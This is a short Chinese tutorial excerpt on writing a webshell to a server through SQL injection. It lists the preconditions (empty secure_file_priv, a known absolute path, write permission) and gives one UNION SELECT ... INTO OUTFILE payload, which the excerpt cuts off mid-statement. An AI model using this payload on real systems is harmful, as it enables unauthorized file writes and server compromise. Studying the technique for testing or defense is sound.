文章目录
- 写shell条件
- 最常见的注入写shell方式
- 报错注入写shell
-
- 错误示范
- lines starting by
- 失败原因
- 其他语法
-
- lines terminated by 写入
- fields terminated by 写入
- COLUMNS terminated by 写入
写shell条件
1、secure_file_priv为空
查询语法:SHOW VARIABLES LIKE “secure_file_priv”;
2、知道绝对目录
3、目录有写入权限
最常见的注入写shell方式
union select 后跟 into outfile 语句,这种方式仅支持存在联合注入的前提下面
注入语法:
?id=1 UNION SELECT '<?php phpinfo();?>',2,3 into OUT
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)